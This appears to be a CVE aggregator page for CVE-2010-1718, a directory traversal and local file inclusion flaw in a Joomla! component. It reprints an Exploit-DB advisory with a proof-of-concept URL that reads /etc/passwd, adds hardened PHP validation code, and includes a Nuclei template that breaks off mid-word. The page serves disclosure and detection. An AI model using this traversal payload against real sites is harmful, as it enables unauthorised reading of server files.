CVE-2010-1718
Published 2010-05-04
Priority: P3 47, medium, 6.8 (CVSS 2.0)
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 9.46% (94.8th percentile)
Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lispeltuut | com_archeryscores | — | — |
No detection rules found.
Exploit-DB
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
exploitdb·2010-04-18
---
Title : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
Vendor : http://lispeltuut.org/
Download : http://lispeltuut.org/archery-scores/download
Date : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
[+] Vulnerable
./components/com_archeryscores/archeryscores.php
Line 22: if($controller = JRequest::getVar('controller')) {
Line 23: require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
Line 24: }
[+] Exploit
http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
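For comparison with lines 22-24 quoted in the advisory above, here is a hardened form of the controller lookup, as an added example that is not code from the component, its vendor, or the advisory authors. The helper name `resolve_controller()` and the demo directory and file names are assumptions made for illustration.

```php
<?php
// Added example: allowlist-style validation for a "controller" request value.
// resolve_controller() is a hypothetical helper, not part of Joomla! or the component.

function resolve_controller(string $controllersDir, $controller): ?string
{
    // Accept only a plain identifier. This rejects arrays (controller[]=x),
    // dots, slashes, backslashes and NUL bytes before any path is built.
    if (!is_string($controller) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $controller)) {
        return null;
    }

    $base = realpath($controllersDir);
    $file = realpath($controllersDir . DIRECTORY_SEPARATOR . $controller . '.php');

    // Defence in depth: the resolved file must exist and sit directly inside
    // the controllers directory (also catches symlinks that point elsewhere).
    if ($base === false || $file === false || dirname($file) !== $base) {
        return null;
    }
    return $file;
}

// Constructed demo: a temporary controllers directory with one legitimate file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'controllers_demo_' . getmypid();
@mkdir($dir);
$stub = $dir . DIRECTORY_SEPARATOR . 'scores.php';
file_put_contents($stub, "<?php // constructed stub controller\n");

// Constructed inputs: one valid name, the traversal shape from the advisory,
// a bare "..", a name with no matching file, and an array value.
$samples = ['scores', "../../../../etc/passwd\0", '..', 'missing', ['x']];

foreach ($samples as $input) {
    $path = resolve_controller($dir, $input);
    printf(
        "%-32s => %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected' : 'require_once ' . basename($path)
    );
}

// Clean up the constructed files.
unlink($stub);
rmdir($dir);
```

In the component, the returned path would be passed to `require_once` in place of the string concatenated from the request value on line 23, and a `null` result would be treated as "no controller".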
Nuclei
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1718 [MEDIUM] Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1718

info:
  name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Unauthenticated attackers can exploit directory traversal th